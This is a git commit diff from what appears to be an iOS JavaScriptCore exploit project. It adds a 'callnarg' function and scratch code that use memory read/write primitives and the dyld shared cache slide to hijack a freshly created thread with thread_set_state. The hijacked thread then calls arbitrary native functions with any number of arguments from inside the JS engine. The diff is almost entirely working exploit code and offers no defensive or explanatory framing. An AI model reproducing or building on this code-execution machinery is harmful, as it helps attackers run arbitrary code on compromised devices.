get rekt ios - as many fucking args as you want (need to work on return still, it'll run in a seperate thread rn async)

author: spv420 <unomilliono@gmail.com> 2022-04-24 05:57:07 -0400
committer: spv420 <unomilliono@gmail.com> 2022-04-24 05:57:07 -0400
commit: eab6e28c9e1b541c505e84ab64a148d6def984c9 (patch)
tree: 8df4adfd893cfa14755b7f158817148bed94c79b
parent: 36dd71290d6a4b7757adb9bbe59f876ada4cc6b8 (diff)
4 files changed, 146 insertions, 64 deletions
diff --git a/old.js b/old.js
new file mode 100644
index 0000000..2dd0509
--- /dev/null
+++ b/old.js
@@ -0,0 +1,70 @@
+var dyld_shc_slide = get_dyld_shc_slide();
+
+	printf("still alive0\n");
+	write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide);
+	printf("still alive1\n");
+	write_u32(stack_shit + 0x0, 0x42069);
+	printf("still alive2\n");
+	write_u32(stack_shit + 0x1, 0x69420);
+	printf("still alive3\n");
+	write_u32(stack_shit + 0x2, 0x13371337);
+	printf("still alive4\n");
+	write_u32(stack_shit + 0x3, 0x6969);
+	printf("still alive5\n");
+
+	printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
+	calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0);
+	printf("%x\n", read_u32(threadptr));
+	thread = read_u32(threadptr);
+	calls4arg("usleep", 100000, 0, 0, 0);
+	printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
+//	call4arg(0x41414141, 0, 0, 0, 0);
+	printf("still alive6\n");
+	write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+//	write_u32(th, 0xa03);
+	printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]);
+
+	var info = 0x134004;
+	var whatever = 0x134000;
+
+	/*
+	var lol = new Uint8Array(0x100);
+
+	for (i = 0; i < 0x10000; i++) {
+		write_buf(info, lol, 0x100);
+		write_u32(whatever, 0x100)
+//	printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0));
+	calls4arg("thread_info", i, 3, info, whatever);
+//	printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
+		if (read_u32(info) != 0) {
+//	printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
+			printf("hit: %x\n", i);
+		} else if (i % 0x10 == 0) {
+			printf("%x\n", i);
+		}
+	}*/
+
+	printf("still alive7\n");
+	write_u32(thread_state + (0 << 2), sptr("Hello, world! %x %x %x %x %x %x %x\n"));
+	printf("still alive8\n");
+	write_u32(thread_state + (1 << 2), 0x1337);
+	printf("still alive9\n");
+	write_u32(thread_state + (2 << 2), 0x420);
+	printf("still alive10\n");
+	write_u32(thread_state + (3 << 2), 0x69);
+	printf("still alive11\n");
+	write_u32(thread_state + (13 << 2), stack_shit);
+	printf("still alive12\n");
+	write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide);
+	printf("still alive13\n");
+	write_u32(thread_state + (15 << 2), sym_cache["printf"]);
+	printf("still alive14\n");
+	write_u32(thread_state + (16 << 2), 0x40000020);
+
+	printf("still alive15\n");
+	printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT));
+	printf("still alive16\n");
+	printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0));
+	printf("still alive17\n");
+
+	calls4arg("sleep", 10, 0, 0, 0);
+\ No newline at end of file
diff --git a/src/js/main.js b/src/js/main.js
index d611329..683c96a 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -12,13 +12,13 @@ var ARM_THREAD_STATE = 0x1;
 var ARM_THREAD_STATE_COUNT = 0x11;
 
 try {
-	log("we out here in jsc");
+	puts("we out here in jsc");
 } catch (e) {
 	/*
-	 *  we don't have log. :(
+	 *  we don't have puts. :(
 	 */
 
-	log = function (){};
+	puts = function (){};
 }
 
 function main() {
@@ -34,29 +34,11 @@ function main() {
 	slide = get_our_slide();
 	base = 0x4000 + (slide << 12);
 	slid = (slide << 12);
-	mytask = 0;
-	count = 0x130000;
-	th = 0x130100;
-//	thread_state_ptr = 0x130008;
-	thread_state = 0x130200;
-	countptr = 0x131000;
-	thptr = 0x131004;
-	thread_stateptr = 0x131008;
-
-	countptrptr = 0x132000;
-	thptrptr = 0x132004;
-	thread_stateptrptr = 0x132008;
-
-	write_u32(countptr, count);
-	write_u32(thptr, th);
-	write_u32(thread_stateptr, thread_state);
-
-	write_u32(countptrptr, countptr);
-	write_u32(thptrptr, thptr);
-	write_u32(thread_stateptrptr, thread_stateptr);
 
 	init_sptr_heap();
 
+	var i = 0;
+
 	puts("we out here");
 	puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
 
@@ -65,35 +47,14 @@ function main() {
 	printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
 	printf("*(uint32_t*)base = 0x%x\n", read_u32(base));
 
-	puts("alive");
-	mytask = calls4arg("mach_task_self", 0, 0, 0, 0);
-
-	printf("%x %x %x\n", mytask, thptr, th);
-	printf("%x %x\n", thread_stateptr, countptr);
-
-	puts("alive");
-	calls4arg("thread_create", mytask, th, 0, 0);
-	printf("mytask=%x th=%x\n", mytask, read_u32(th));
-	puts("alive");
-	calls4arg("thread_get_state", thptr, ARM_THREAD_STATE, thread_stateptrptr, countptr);
-	printf("thread_state=%x\n", read_u32(thread_state));
-	puts("alive");
-	for (var i = 0; i < 16; i++) {
-		write_u32(thread_state + (i << 2), 0x41414140 + i);
-	}
-	printf("thread_state=%x\n", read_u32(thread_state));
-	puts("alive");
-	calls4arg("thread_set_state", thptr, ARM_THREAD_STATE, thread_stateptrptr, ARM_THREAD_STATE_COUNT);
-	puts("alive");
-	calls4arg("thread_resume", thptr, 0, 0, 0);
-	puts("alive");
+	callnarg(sym_cache["printf"], sptr("Hello world! %x %x %x %x %x %x %x %x %x %x %x %x %x\n"), 0x420, 0x69, 0x1337, 0x13371337, 0xb1a7e17, 0x41424344);
 
 //	var i = 0;
 //	while (true) {
-//		calls4arg("syslog", 0x28, sptr("get rekt from jsc %d (slide=%x)\n"), i, slide);
+//		calls4arg("sysputs", 0x28, sptr("get rekt from jsc %d (slide=%x)\n"), i, slide);
 //		calls4arg("sleep", 1, 0, 0, 0);
 //		i++;
 //	}
 
-	log("still alive");
+	printf("still alive18\n");
 };
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 996f5a8..687e758 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -97,3 +97,63 @@ function calls4arg(sym, r0, r1, r2, r3) {
 	}
 	return call4arg(addy, r0, r1, r2, r3);
 }
+
+function callnarg() {
+	if (arguments.length < 1) {
+		return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
+	}
+
+	mytask = 0;
+	count = 0x130000;
+	th = 0x130100;
+//	thread_state_ptr = 0x130008;
+	thread_state = 0x130200;
+	countptr = 0x131000;
+	thptr = 0x131004;
+	thread_stateptr = 0x131008;
+	thread = 0x130300;
+	threadptr = 0x132300;
+	threadptrptr = 0x133300;
+
+	countptrptr = 0x132000;
+	thptrptr = 0x132004;
+	thread_stateptrptr = 0x132008;
+
+	var stack_shit = 0x161000;
+
+	write_u32(countptr, count);
+	write_u32(thptr, th);
+	write_u32(threadptr, thread);
+	write_u32(thread_stateptr, thread_state);
+
+	write_u32(countptrptr, countptr);
+	write_u32(thptrptr, thptr);
+	write_u32(threadptrptr, threadptr);
+	write_u32(thread_stateptrptr, thread_stateptr);	
+
+	var addy = arguments[0];
+
+	var dyld_shc_slide = get_dyld_shc_slide();
+
+	write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide);
+
+	calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0);
+	var thread = read_u32(threadptr);
+	write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+
+	for (var i = 1; i < arguments.length; i++) {
+		if (i <= 4) {
+			write_u32(thread_state + ((i - 1) << 2), arguments[i]);
+		} else {
+			write_u32(stack_shit + ((i - 5) << 2), arguments[i]);
+		}
+	}
+
+	write_u32(thread_state + (13 << 2), stack_shit);
+	write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide);
+	write_u32(thread_state + (15 << 2), addy);
+	write_u32(thread_state + (16 << 2), 0x40000020);
+
+	calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
+	calls4arg("thread_resume", read_u32(th), 0, 0, 0);
+}
+\ No newline at end of file
diff --git a/tools/thread_shit.c b/tools/thread_shit.c
index 1ed9921..cbfbe23 100644
--- a/tools/thread_shit.c
+++ b/tools/thread_shit.c
@@ -17,6 +17,9 @@ int main(int argc, char* argv[]) {
 	kern_return_t kr;
 	thread_t th;
 	mach_port_name_t mytask, mythread;
+	arm_thread_state_t state;
+	mach_msg_type_number_t count;
+
 	printf("Hello, world!\n");
 	mytask = mach_task_self();
 	mythread = mach_thread_self();
@@ -30,32 +33,21 @@ int main(int argc, char* argv[]) {
 	pthread_create(&thread, NULL, lol2, NULL);
 
 	puts("test");
+	printf("%x %x\n", &thread, thread);
 
-//	thread_create(mytask, &th);
 	th = pthread_mach_thread_np(thread);
-	printf("%x\n", mytask);
-	arm_thread_state_t state;
-	mach_msg_type_number_t count;
 	kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count);
 
+	printf("%x\n", THREAD_BASIC_INFO);
+
+	printf("%x\n", th);
+
 	uint32_t* stack_above = 0x2001000;
 	stack_above[0] = 0x42069;
 	stack_above[1] = 0x69420;
 	stack_above[3] = 0x13371337;
 	stack_above[4] = 0x6969;
 
-//	fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts"));
-
-//	exit(42);
-
-//	*(uint32_t*)0x41414141 = 0;
-
-//	memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t));
-
-	for (int i = 0; i < 13; i++) {
-		fprintf(stderr, "r%d=%x\n", i, state.__r[i]);
-	}
-
 	*(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000;
 
 	state.__r[0] = test;
@@ -68,7 +60,6 @@ int main(int argc, char* argv[]) {
 	state.__cpsr = 0x40000020;
 	kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT);
 	kr = thread_resume(th);
-//	thread_call_enter((thread_call_func_t)&lol);
 
 	sleep(1);
author	spv420 <unomilliono@gmail.com>	2022-04-24 05:57:07 -0400
committer	spv420 <unomilliono@gmail.com>	2022-04-24 05:57:07 -0400
commit	eab6e28c9e1b541c505e84ab64a148d6def984c9 (patch)
tree	8df4adfd893cfa14755b7f158817148bed94c79b
parent	36dd71290d6a4b7757adb9bbe59f876ada4cc6b8 (diff)